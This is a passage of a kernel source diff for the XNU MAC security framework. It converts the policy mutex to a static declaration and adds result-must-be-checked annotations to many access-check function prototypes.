SECURITY_MAC_CTLFLAGS, * For a few special operations involving a change to the list of * active policies, the mtx itself must be held. */ -static lck_mtx_t *mac_policy_mtx; +static LCK_GRP_DECLARE(mac_lck_grp, "MAC lock"); +static LCK_MTX_DECLARE(mac_policy_mtx, &mac_lck_grp); /* * Policy list array allocation chunk size. Each entry holds a pointer. @@ -269,11 +270,11 @@ struct mac_label_element_list_t mac_static_label_element_list; static __inline void mac_policy_grab_exclusive(void) { - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); while (mac_policy_busy != 0) { - lck_mtx_sleep(mac_policy_mtx, LCK_SLEEP_UNLOCK, + lck_mtx_sleep(&mac_policy_mtx, LCK_SLEEP_UNLOCK, (event_t)&mac_policy_busy, THREAD_UNINT); - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); } } @@ -282,16 +283,16 @@ mac_policy_release_exclusive(void) { KASSERT(mac_policy_busy == 0, ("mac_policy_release_exclusive(): not exclusive")); - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); thread_wakeup((event_t) &mac_policy_busy); } void mac_policy_list_busy(void) { - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); mac_policy_busy++; - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); } int @@ -303,27 +304,27 @@ mac_policy_list_conditional_busy(void) return 0; } - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); if (mac_policy_list.numloaded > mac_policy_list.staticmax) { mac_policy_busy++; ret = 1; } else { ret = 0; } - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); return ret; } void mac_policy_list_unbusy(void) { - lck_mtx_lock(mac_policy_mtx); + lck_mtx_lock(&mac_policy_mtx); mac_policy_busy--; KASSERT(mac_policy_busy >= 0, ("MAC_POLICY_LIST_LOCK")); if (mac_policy_busy == 0) { thread_wakeup(&mac_policy_busy); } - lck_mtx_unlock(mac_policy_mtx); + lck_mtx_unlock(&mac_policy_mtx); } /* @@ -332,10 +333,6 @@ mac_policy_list_unbusy(void) void mac_policy_init(void) { - lck_grp_attr_t *mac_lck_grp_attr; - lck_attr_t *mac_lck_attr; - lck_grp_t *mac_lck_grp; - mac_policy_list.numloaded = 0; mac_policy_list.max = MAC_POLICY_LIST_CHUNKSIZE; mac_policy_list.maxindex = 0; @@ -353,15 +350,6 @@ mac_policy_init(void) LIST_INIT(&mac_label_element_list); LIST_INIT(&mac_static_label_element_list); - - mac_lck_grp_attr = lck_grp_attr_alloc_init(); - mac_lck_grp = lck_grp_alloc_init("MAC lock", mac_lck_grp_attr); - mac_lck_attr = lck_attr_alloc_init(); - lck_attr_setdefault(mac_lck_attr); - mac_policy_mtx = lck_mtx_alloc_init(mac_lck_grp, mac_lck_attr); - lck_attr_free(mac_lck_attr); - lck_grp_attr_free(mac_lck_grp_attr); - lck_grp_free(mac_lck_grp); } /* Function pointer set up for loading security extensions. diff --git a/security/mac_framework.h b/security/mac_framework.h index 5a30437a0..ed331a65d 100644 --- a/security/mac_framework.h +++ b/security/mac_framework.h @@ -121,6 +121,7 @@ struct vnode; struct vnode_attr; struct vop_setlabel_args; +#include #include #include @@ -142,16 +143,16 @@ typedef struct OSObject *io_object_t; /*@ === */ int mac_audit_check_postselect(kauth_cred_t cred, unsigned short syscode, - void *args, int error, int retval, int mac_forced); + void *args, int error, int retval, int mac_forced) __result_use_check; int mac_audit_check_preselect(kauth_cred_t cred, unsigned short syscode, - void *args); + void *args) __result_use_check; int mac_cred_check_label_update(kauth_cred_t cred, - struct label *newlabel); + struct label *newlabel) __result_use_check; int mac_cred_check_label_update_execve(vfs_context_t ctx, struct vnode *vp, off_t offset, struct vnode *scriptvp, struct label *scriptvnodelabel, struct label *execlabel, - proc_t proc, void *macextensions); -int mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2); + proc_t proc, void *macextensions) __result_use_check; +int mac_cred_check_visible(kauth_cred_t u1, kauth_cred_t u2) __result_use_check; struct label *mac_cred_label_alloc(void); void mac_cred_label_associate(kauth_cred_t cred_parent, kauth_cred_t cred_child); @@ -159,10 +160,11 @@ void mac_cred_label_associate_fork(kauth_cred_t cred, proc_t child); void mac_cred_label_associate_kernel(kauth_cred_t cred); void mac_cred_label_associate_user(kauth_cred_t cred); void mac_cred_label_destroy(kauth_cred_t cred); -int mac_cred_label_externalize_audit(proc_t p, struct mac *mac); +int mac_cred_label_externalize_audit(proc_t p, struct mac *mac) __result_use_check; void mac_cred_label_free(struct label *label); void mac_cred_label_init(kauth_cred_t cred); -int mac_cred_label_compare(struct label *a, struct label *b); +bool mac_cred_label_is_equal(const struct label *a, const struct label *b) __result_use_check; +uint32_t mac_cred_label_hash_update(const struct label *a, uint32_t hash); void mac_cred_label_update(kauth_cred_t cred, struct label *newlabel); void mac_cred_label_update_execve(vfs_context_t ctx, kauth_cred_t newcred, struct vnode *vp, off_t offset, struct vnode *scriptvp, @@ -177,93 +179,94 @@ void mac_devfs_label_destroy(struct devnode *de); void mac_devfs_label_init(struct devnode *de); void mac_devfs_label_update(struct mount *mp, struct devnode *de, struct vnode *vp); -int mac_execve_enter(user_addr_t mac_p, struct image_params *imgp); -int mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg); -int mac_file_check_create(kauth_cred_t cred); -int mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd); +int mac_execve_enter(user_addr_t mac_p, struct image_params *imgp) __result_use_check; +int mac_file_check_change_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check; +int mac_file_check_create(kauth_cred_t cred) __result_use_check; +int mac_file_check_dup(kauth_cred_t cred, struct fileglob *fg, int newfd) __result_use_check; int mac_file_check_fcntl(kauth_cred_t cred, struct fileglob *fg, int cmd, - user_long_t arg); + user_long_t arg) __result_use_check; int mac_file_check_get(kauth_cred_t cred, struct fileglob *fg, - char *elements, size_t len); -int mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg); -int mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg); + char *elements, size_t len) __result_use_check; +int mac_file_check_get_offset(kauth_cred_t cred, struct fileglob *fg) __result_use_check; +int mac_file_check_inherit(kauth_cred_t cred, struct fileglob *fg) __result_use_check; int mac_file_check_ioctl(kauth_cred_t cred, struct fileglob *fg, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_file_check_lock(kauth_cred_t cred, struct fileglob *fg, int op, - struct flock *fl); + struct flock *fl) __result_use_check; int mac_file_check_library_validation(struct proc *proc, struct fileglob *fg, off_t slice_offset, - user_long_t error_message, size_t error_message_size); + user_long_t error_message, size_t error_message_size) __result_use_check; int mac_file_check_mmap(kauth_cred_t cred, struct fileglob *fg, - int prot, int flags, uint64_t file_pos, int *maxprot); + int prot, int flags, uint64_t file_pos, int *maxprot) __result_use_check; void mac_file_check_mmap_downgrade(kauth_cred_t cred, struct fileglob *fg, int *prot); -int mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg); +int mac_file_check_receive(kauth_cred_t cred, struct fileglob *fg) __result_use_check; int mac_file_check_set(kauth_cred_t cred, struct fileglob *fg, - char *bufp, size_t buflen); + char *bufp, size_t buflen) __result_use_check; void mac_file_notify_close(struct ucred *cred, struct fileglob *fg); void mac_file_label_associate(kauth_cred_t cred, struct fileglob *fg); void mac_file_label_destroy(struct fileglob *fg); void mac_file_label_init(struct fileglob *fg); -int mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type); -int mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties); -int mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry); -int mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name); +int mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type) __result_use_check; +int mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type) __result_use_check; +int mac_iokit_check_set_properties(kauth_cred_t cred, io_object_t registry_entry, io_object_t properties) __result_use_check; +int mac_iokit_check_filter_properties(kauth_cred_t cred, io_object_t registry_entry) __result_use_check; +int mac_iokit_check_get_property(kauth_cred_t cred, io_object_t registry_entry, const char *name) __result_use_check; #ifdef KERNEL_PRIVATE -int mac_iokit_check_hid_control(kauth_cred_t cred); +int mac_iokit_check_hid_control(kauth_cred_t cred) __result_use_check; #endif int mac_mount_check_fsctl(vfs_context_t ctx, struct mount *mp, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_mount_check_getattr(vfs_context_t ctx, struct mount *mp, - struct vfs_attr *vfa); -int mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp); + struct vfs_attr *vfa) __result_use_check; +int mac_mount_check_label_update(vfs_context_t ctx, struct mount *mp) __result_use_check; int mac_mount_check_mount(vfs_context_t ctx, struct vnode *vp, - struct componentname *cnp, const char *vfc_name); -int mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp); + struct componentname *cnp, const char *vfc_name) __result_use_check; +int mac_mount_check_mount_late(vfs_context_t ctx, struct mount *mp) __result_use_check; int mac_mount_check_snapshot_create(vfs_context_t ctx, struct mount *mp, - const char *name); + const char *name) __result_use_check; int mac_mount_check_snapshot_delete(vfs_context_t ctx, struct mount *mp, - const char *name); + const char *name) __result_use_check; #ifdef KERNEL_PRIVATE int mac_mount_check_snapshot_mount(vfs_context_t ctx, struct vnode *rvp, struct vnode *vp, struct componentname *cnp, const char *name, - const char *vfc_name); + const char *vfc_name) __result_use_check; #endif int mac_mount_check_snapshot_revert(vfs_context_t ctx, struct mount *mp, - const char *name); -int mac_mount_check_remount(vfs_context_t ctx, struct mount *mp); + const char *name) __result_use_check; +int mac_mount_check_remount(vfs_context_t ctx, struct mount *mp) __result_use_check; int mac_mount_check_setattr(vfs_context_t ctx, struct mount *mp, - struct vfs_attr *vfa); -int mac_mount_check_stat(vfs_context_t ctx, struct mount *mp); -int mac_mount_check_umount(vfs_context_t ctx, struct mount *mp); + struct vfs_attr *vfa) __result_use_check; +int mac_mount_check_stat(vfs_context_t ctx, struct mount *mp) __result_use_check; +int mac_mount_check_umount(vfs_context_t ctx, struct mount *mp) __result_use_check; void mac_mount_label_associate(vfs_context_t ctx, struct mount *mp); void mac_mount_label_destroy(struct mount *mp); int mac_mount_label_externalize(struct label *label, char *elements, - char *outbuf, size_t outbuflen); -int mac_mount_label_get(struct mount *mp, user_addr_t mac_p); + char *outbuf, size_t outbuflen) __result_use_check; +int mac_mount_label_get(struct mount *mp, user_addr_t mac_p) __result_use_check; void mac_mount_label_init(struct mount *); -int mac_mount_label_internalize(struct label *, char *string); +int mac_mount_label_internalize(struct label *, char *string) __result_use_check; int mac_pipe_check_ioctl(kauth_cred_t cred, struct pipe *cpipe, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_pipe_check_kqfilter(kauth_cred_t cred, struct knote *kn, - struct pipe *cpipe); -int mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe); + struct pipe *cpipe) __result_use_check; +int mac_pipe_check_read(kauth_cred_t cred, struct pipe *cpipe) __result_use_check; int mac_pipe_check_select(kauth_cred_t cred, struct pipe *cpipe, - int which); -int mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe); -int mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe); + int which) __result_use_check; +int mac_pipe_check_stat(kauth_cred_t cred, struct pipe *cpipe) __result_use_check; +int mac_pipe_check_write(kauth_cred_t cred, struct pipe *cpipe) __result_use_check; struct label *mac_pipe_label_alloc(void); void mac_pipe_label_associate(kauth_cred_t cred, struct pipe *cpipe); void mac_pipe_label_destroy(struct pipe *cpipe); void mac_pipe_label_free(struct label *label); void mac_pipe_label_init(struct pipe *cpipe); void mac_policy_initbsd(void); -int mac_posixsem_check_create(kauth_cred_t cred, const char *name); -int mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem); -int mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem); +int mac_posixsem_check_create(kauth_cred_t cred, const char *name) __result_use_check; +int mac_posixsem_check_open(kauth_cred_t cred, struct pseminfo *psem) __result_use_check; +int mac_posixsem_check_post(kauth_cred_t cred, struct pseminfo *psem) __result_use_check; int mac_posixsem_check_unlink(kauth_cred_t cred, struct pseminfo *psem, - const char *name); -int mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem); + const char *name) __result_use_check; +int mac_posixsem_check_wait(kauth_cred_t cred, struct pseminfo *psem) __result_use_check; void mac_posixsem_vnode_label_associate(kauth_cred_t cred, struct pseminfo *psem, struct label *plabel, vnode_t vp, struct label *vlabel); @@ -271,16 +274,16 @@ void mac_posixsem_label_associate(kauth_cred_t cred, struct pseminfo *psem, const char *name); void mac_posixsem_label_destroy(struct pseminfo *psem); void mac_posixsem_label_init(struct pseminfo *psem); -int mac_posixshm_check_create(kauth_cred_t cred, const char *name); +int mac_posixshm_check_create(kauth_cred_t cred, const char *name) __result_use_check; int mac_posixshm_check_mmap(kauth_cred_t cred, struct pshminfo *pshm, - int prot, int flags); + int prot, int flags) __result_use_check; int mac_posixshm_check_open(kauth_cred_t cred, struct pshminfo *pshm, - int fflags); -int mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm); + int fflags) __result_use_check; +int mac_posixshm_check_stat(kauth_cred_t cred, struct pshminfo *pshm) __result_use_check; int mac_posixshm_check_truncate(kauth_cred_t cred, struct pshminfo *pshm, - off_t s); + off_t s) __result_use_check; int mac_posixshm_check_unlink(kauth_cred_t cred, struct pshminfo *pshm, - const char *name); + const char *name) __result_use_check; void mac_posixshm_vnode_label_associate(kauth_cred_t cred, struct pshminfo *pshm, struct label *plabel, vnode_t vp, struct label *vlabel); @@ -288,233 +291,234 @@ void mac_posixshm_label_associate(kauth_cred_t cred, struct pshminfo *pshm, const char *name); void mac_posixshm_label_destroy(struct pshminfo *pshm); void mac_posixshm_label_init(struct pshminfo *pshm); -int mac_priv_check(kauth_cred_t cred, int priv); -int mac_priv_grant(kauth_cred_t cred, int priv); -int mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident); -int mac_proc_check_dump_core(proc_t proc); -int mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor); -int mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op); -int mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op); -int mac_proc_check_fork(proc_t proc); -int mac_proc_check_suspend_resume(proc_t proc, int sr); -int mac_proc_check_get_task_name(kauth_cred_t cred, proc_ident_t pident); -int mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident); -int mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident); -int mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp); -int mac_proc_check_getaudit(proc_t proc); -int mac_proc_check_getauid(proc_t proc); +int mac_priv_check(kauth_cred_t cred, int priv) __result_use_check; +int mac_priv_grant(kauth_cred_t cred, int priv) __result_use_check; +int mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident) __result_use_check; +int mac_proc_check_dump_core(proc_t proc) __result_use_check; +int mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor) __result_use_check; +int mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check; +int mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check; +int mac_proc_check_fork(proc_t proc) __result_use_check; +int mac_proc_check_suspend_resume(proc_t proc, int sr) __result_use_check; +int mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check; +int mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check; +int mac_proc_check_get_movable_control_port(void) __result_use_check; +int mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp) __result_use_check; +int mac_proc_check_getaudit(proc_t proc) __result_use_check; +int mac_proc_check_getauid(proc_t proc) __result_use_check; int mac_proc_check_getlcid(proc_t proc1, proc_t proc2, - pid_t pid); -int mac_proc_check_ledger(proc_t curp, proc_t target, int op); + pid_t pid) __result_use_check; +int mac_proc_check_dyld_process_info_notify_register(void) __result_use_check; +int mac_proc_check_ledger(proc_t curp, proc_t target, int op) __result_use_check; int mac_proc_check_map_anon(proc_t proc, user_addr_t u_addr, - user_size_t u_size, int prot, int flags, int *maxprot); + user_size_t u_size, int prot, int flags, int *maxprot) __result_use_check; int mac_proc_check_mprotect(proc_t proc, - user_addr_t addr, user_size_t size, int prot); -int mac_proc_check_run_cs_invalid(proc_t proc); + user_addr_t addr, user_size_t size, int prot) __result_use_check; +int mac_proc_check_run_cs_invalid(proc_t proc) __result_use_check; void mac_proc_notify_cs_invalidated(proc_t proc); -int mac_proc_check_sched(proc_t proc, proc_t proc2); -int mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai); -int mac_proc_check_setauid(proc_t proc, uid_t auid); +int mac_proc_check_sched(proc_t proc, proc_t proc2) __result_use_check; +int mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai) __result_use_check; +int mac_proc_check_setauid(proc_t proc, uid_t auid) __result_use_check; int mac_proc_check_setlcid(proc_t proc1, proc_t proc2, - pid_t pid1, pid_t pid2); + pid_t pid1, pid_t pid2) __result_use_check; int mac_proc_check_signal(proc_t proc1, proc_t proc2, - int signum); -int mac_proc_check_syscall_unix(proc_t proc, int scnum); -int mac_proc_check_wait(proc_t proc1, proc_t proc2); + int signum) __result_use_check; +int mac_proc_check_syscall_unix(proc_t proc, int scnum) __result_use_check; +int mac_proc_check_wait(proc_t proc1, proc_t proc2) __result_use_check; void mac_proc_notify_exit(proc_t proc); -int mac_socket_check_accept(kauth_cred_t cred, struct socket *so); -int mac_socket_check_accepted(kauth_cred_t cred, struct socket *so); +int mac_socket_check_accept(kauth_cred_t cred, struct socket *so) __result_use_check; +int mac_socket_check_accepted(kauth_cred_t cred, struct socket *so) __result_use_check; int mac_socket_check_bind(kauth_cred_t cred, struct socket *so, - struct sockaddr *addr); + struct sockaddr *addr) __result_use_check; int mac_socket_check_connect(kauth_cred_t cred, struct socket *so, - struct sockaddr *addr); + struct sockaddr *addr) __result_use_check; int mac_socket_check_create(kauth_cred_t cred, int domain, - int type, int protocol); + int type, int protocol) __result_use_check; int mac_socket_check_ioctl(kauth_cred_t cred, struct socket *so, - unsigned long cmd); -int mac_socket_check_listen(kauth_cred_t cred, struct socket *so); -int mac_socket_check_receive(kauth_cred_t cred, struct socket *so); + unsigned long cmd) __result_use_check; +int mac_socket_check_listen(kauth_cred_t cred, struct socket *so) __result_use_check; +int mac_socket_check_receive(kauth_cred_t cred, struct socket *so) __result_use_check; int mac_socket_check_received(kauth_cred_t cred, struct socket *so, - struct sockaddr *saddr); + struct sockaddr *saddr) __result_use_check; int mac_socket_check_send(kauth_cred_t cred, struct socket *so, - struct sockaddr *addr); + struct sockaddr *addr) __result_use_check; int mac_socket_check_getsockopt(kauth_cred_t cred, struct socket *so, - struct sockopt *sopt); + struct sockopt *sopt) __result_use_check; int mac_socket_check_setsockopt(kauth_cred_t cred, struct socket *so, - struct sockopt *sopt); -int mac_socket_check_stat(kauth_cred_t cred, struct socket *so); + struct sockopt *sopt) __result_use_check; +int mac_socket_check_stat(kauth_cred_t cred, struct socket *so) __result_use_check; void mac_socket_label_associate(kauth_cred_t cred, struct socket *so); void mac_socket_label_associate_accept(struct socket *oldsocket, struct socket *newsocket); void mac_socket_label_copy(struct label *from, struct label *to); void mac_socket_label_destroy(struct socket *); int mac_socket_label_get(kauth_cred_t cred, struct socket *so, - struct mac *extmac); -int mac_socket_label_init(struct socket *, int waitok); + struct mac *extmac) __result_use_check; +int mac_socket_label_init(struct socket *, int waitok) __result_use_check; void mac_socketpeer_label_associate_socket(struct socket *peersocket, struct socket *socket_to_modify); int mac_socketpeer_label_get(kauth_cred_t cred, struct socket *so, - struct mac *extmac); -int mac_system_check_acct(kauth_cred_t cred, struct vnode *vp); -int mac_system_check_audit(kauth_cred_t cred, void *record, int length); -int mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp); -int mac_system_check_auditon(kauth_cred_t cred, int cmd); -int mac_system_check_host_priv(kauth_cred_t cred); -int mac_system_check_info(kauth_cred_t, const char *info_type); -int mac_system_check_nfsd(kauth_cred_t cred); -int mac_system_check_reboot(kauth_cred_t cred, int howto); -int mac_system_check_settime(kauth_cred_t cred); -int mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp); -int mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp); + struct mac *extmac) __result_use_check; +int mac_system_check_acct(kauth_cred_t cred, struct vnode *vp) __result_use_check; +int mac_system_check_audit(kauth_cred_t cred, void *record, int length) __result_use_check; +int mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp) __result_use_check; +int mac_system_check_auditon(kauth_cred_t cred, int cmd) __result_use_check; +int mac_system_check_host_priv(kauth_cred_t cred) __result_use_check; +int mac_system_check_info(kauth_cred_t, const char *info_type) __result_use_check; +int mac_system_check_nfsd(kauth_cred_t cred) __result_use_check; +int mac_system_check_reboot(kauth_cred_t cred, int howto) __result_use_check; +int mac_system_check_settime(kauth_cred_t cred) __result_use_check; +int mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp) __result_use_check; +int mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp) __result_use_check; int mac_system_check_sysctlbyname(kauth_cred_t cred, const char *namestring, int *name, size_t namelen, user_addr_t oldctl, size_t oldlen, - user_addr_t newctl, size_t newlen); -int mac_system_check_kas_info(kauth_cred_t cred, int selector); + user_addr_t newctl, size_t newlen) __result_use_check; +int mac_system_check_kas_info(kauth_cred_t cred, int selector) __result_use_check; void mac_sysvmsg_label_associate(kauth_cred_t cred, struct msqid_kernel *msqptr, struct msg *msgptr); void mac_sysvmsg_label_init(struct msg *msgptr); void mac_sysvmsg_label_recycle(struct msg *msgptr); int mac_sysvmsq_check_enqueue(kauth_cred_t cred, struct msg *msgptr, - struct msqid_kernel *msqptr); -int mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr); -int mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr); + struct msqid_kernel *msqptr) __result_use_check; +int mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr) __result_use_check; +int mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr) __result_use_check; int mac_sysvmsq_check_msqctl(kauth_cred_t cred, - struct msqid_kernel *msqptr, int cmd); + struct msqid_kernel *msqptr, int cmd) __result_use_check; int mac_sysvmsq_check_msqget(kauth_cred_t cred, - struct msqid_kernel *msqptr); + struct msqid_kernel *msqptr) __result_use_check; int mac_sysvmsq_check_msqrcv(kauth_cred_t cred, - struct msqid_kernel *msqptr); + struct msqid_kernel *msqptr) __result_use_check; int mac_sysvmsq_check_msqsnd(kauth_cred_t cred, - struct msqid_kernel *msqptr); + struct msqid_kernel *msqptr) __result_use_check; void mac_sysvmsq_label_associate(kauth_cred_t cred, struct msqid_kernel *msqptr); void mac_sysvmsq_label_init(struct msqid_kernel *msqptr); void mac_sysvmsq_label_recycle(struct msqid_kernel *msqptr); int mac_sysvsem_check_semctl(kauth_cred_t cred, - struct semid_kernel *semakptr, int cmd); + struct semid_kernel *semakptr, int cmd) __result_use_check; int mac_sysvsem_check_semget(kauth_cred_t cred, - struct semid_kernel *semakptr); + struct semid_kernel *semakptr) __result_use_check; int mac_sysvsem_check_semop(kauth_cred_t cred, - struct semid_kernel *semakptr, size_t accesstype); + struct semid_kernel *semakptr, size_t accesstype) __result_use_check; void mac_sysvsem_label_associate(kauth_cred_t cred, struct semid_kernel *semakptr); void mac_sysvsem_label_destroy(struct semid_kernel *semakptr); void mac_sysvsem_label_init(struct semid_kernel *semakptr); void mac_sysvsem_label_recycle(struct semid_kernel *semakptr); int mac_sysvshm_check_shmat(kauth_cred_t cred, - struct shmid_kernel *shmsegptr, int shmflg); + struct shmid_kernel *shmsegptr, int shmflg) __result_use_check; int mac_sysvshm_check_shmctl(kauth_cred_t cred, - struct shmid_kernel *shmsegptr, int cmd); + struct shmid_kernel *shmsegptr, int cmd) __result_use_check; int mac_sysvshm_check_shmdt(kauth_cred_t cred, - struct shmid_kernel *shmsegptr); + struct shmid_kernel *shmsegptr) __result_use_check; int mac_sysvshm_check_shmget(kauth_cred_t cred, - struct shmid_kernel *shmsegptr, int shmflg); + struct shmid_kernel *shmsegptr, int shmflg) __result_use_check; void mac_sysvshm_label_associate(kauth_cred_t cred, struct shmid_kernel *shmsegptr); void mac_sysvshm_label_destroy(struct shmid_kernel *shmsegptr); void mac_sysvshm_label_init(struct shmid_kernel* shmsegptr); void mac_sysvshm_label_recycle(struct shmid_kernel *shmsegptr); int mac_vnode_check_access(vfs_context_t ctx, struct vnode *vp, - int acc_mode); -int mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp); + int acc_mode) __result_use_check; +int mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp) __result_use_check; int mac_vnode_check_chroot(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp); + struct componentname *cnp) __result_use_check; int mac_vnode_check_clone(vfs_context_t ctx, struct vnode *dvp, - struct vnode *vp, struct componentname *cnp); + struct vnode *vp, struct componentname *cnp) __result_use_check; int mac_vnode_check_create(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp, struct vnode_attr *vap); + struct componentname *cnp, struct vnode_attr *vap) __result_use_check; int mac_vnode_check_deleteextattr(vfs_context_t ctx, struct vnode *vp, - const char *name); + const char *name) __result_use_check; int mac_vnode_check_exchangedata(vfs_context_t ctx, struct vnode *v1, - struct vnode *v2); + struct vnode *v2) __result_use_check; int mac_vnode_check_exec(vfs_context_t ctx, struct vnode *vp, - struct image_params *imgp); -int mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp); + struct image_params *imgp) __result_use_check; +int mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_getattr(vfs_context_t ctx, struct ucred *file_cred, - struct vnode *vp, struct vnode_attr *va); + struct vnode *vp, struct vnode_attr *va) __result_use_check; int mac_vnode_check_getattrlist(vfs_context_t ctx, struct vnode *vp, - struct attrlist *alist); + struct attrlist *alist) __result_use_check; int mac_vnode_check_getextattr(vfs_context_t ctx, struct vnode *vp, - const char *name, struct uio *uio); + const char *name, struct uio *uio) __result_use_check; int mac_vnode_check_ioctl(vfs_context_t ctx, struct vnode *vp, - unsigned long cmd); + unsigned long cmd) __result_use_check; int mac_vnode_check_kqfilter(vfs_context_t ctx, - kauth_cred_t file_cred, struct knote *kn, struct vnode *vp); + kauth_cred_t file_cred, struct knote *kn, struct vnode *vp) __result_use_check; int mac_vnode_check_label_update(vfs_context_t ctx, struct vnode *vp, - struct label *newlabel); + struct label *newlabel); __result_use_check int mac_vnode_check_link(vfs_context_t ctx, struct vnode *dvp, - struct vnode *vp, struct componentname *cnp); -int mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp); + struct vnode *vp, struct componentname *cnp) __result_use_check; +int mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_lookup(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp); + struct componentname *cnp) __result_use_check; int mac_vnode_check_lookup_preflight(vfs_context_t ctx, struct vnode *dvp, - const char *path, size_t pathlen); + const char *path, size_t pathlen) __result_use_check; int mac_vnode_check_open(vfs_context_t ctx, struct vnode *vp, - int acc_mode); + int acc_mode) __result_use_check; int mac_vnode_check_read(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); -int mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp); -int mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; +int mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp) __result_use_check; +int mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_rename(vfs_context_t ctx, struct vnode *dvp, struct vnode *vp, struct componentname *cnp, struct vnode *tdvp, - struct vnode *tvp, struct componentname *tcnp); -int mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp); + struct vnode *tvp, struct componentname *tcnp) __result_use_check; +int mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp) __result_use_check; int mac_vnode_check_searchfs(vfs_context_t ctx, struct vnode *vp, - struct attrlist *alist); + struct attrlist *alist) __result_use_check; int mac_vnode_check_select(vfs_context_t ctx, struct vnode *vp, - int which); + int which) __result_use_check; int mac_vnode_check_setacl(vfs_context_t ctx, struct vnode *vp, - struct kauth_acl *acl); + struct kauth_acl *acl) __result_use_check; int mac_vnode_check_setattrlist(vfs_context_t ctxd, struct vnode *vp, - struct attrlist *alist); + struct attrlist *alist) __result_use_check; int mac_vnode_check_setextattr(vfs_context_t ctx, struct vnode *vp, - const char *name, struct uio *uio); + const char *name, struct uio *uio) __result_use_check; int mac_vnode_check_setflags(vfs_context_t ctx, struct vnode *vp, - u_long flags); + u_long flags) __result_use_check; int mac_vnode_check_setmode(vfs_context_t ctx, struct vnode *vp, - mode_t mode); + mode_t mode) __result_use_check; int mac_vnode_check_setowner(vfs_context_t ctx, struct vnode *vp, - uid_t 